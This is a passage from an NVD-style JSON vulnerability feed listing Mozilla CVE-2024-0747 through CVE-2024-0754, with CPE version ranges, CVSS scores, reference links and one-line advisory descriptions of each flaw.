{ "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox_esr:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-06-20T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0747", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1764343", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1764343", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1764343", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1764343", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "When a parent page loaded a child in an iframe with `unsafe-inline`, the parent Content Security Policy could have overridden the child Content Security Policy. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox_esr:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-05-22T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0748", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1783504", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1783504", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1783504", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1783504", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A compromised content process could have updated the document URI. This could have allowed an attacker to set an arbitrary URI in the address bar or history. This vulnerability affects Firefox < 122." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-06-11T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0749", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-346" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1813463", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1813463", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1813463", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1813463", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A phishing site could have repurposed an `about:` dialog to show phishing content with an incorrect origin in the address bar. This vulnerability affects Firefox < 122 and Thunderbird < 115.7." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox_esr:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-05-22T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0750", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1863083", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1863083", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1863083", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1863083", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A bug in popup notifications delay calculation could have made it possible for an attacker to trick a user into granting permissions. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox_esr:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndIncluding" : "115.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-06-20T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0751", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-269" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1865689", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1865689", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1865689", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1865689", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A malicious devtools extension could have been used to escalate privileges. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox_esr:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-06-20T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0752", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1866840", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1866840", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1866840", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1866840", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A use-after-free crash could have occurred on macOS if a Firefox update were being applied on a very busy system. This could have resulted in an exploitable crash. This vulnerability affects Firefox < 122." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-06-20T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0753", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1870262", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1870262", "refsource" : "", "tags" : [ "Issue Tracking", "Release Notes" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1870262", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1870262", "refsource" : "", "tags" : [ "Issue Tracking", "Release Notes" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=JjMb7Z8ak2k", "name" : "https://www.youtube.com/watch?v=JjMb7Z8ak2k", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In specific HSTS configurations an attacker could have bypassed HSTS on a subdomain. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox_esr:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-06-07T21:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0754", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871605", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871605", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871605", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871605", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Some WASM source files could have caused a crash when loaded in devtools. This vulnerability affects Firefox < 122." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { 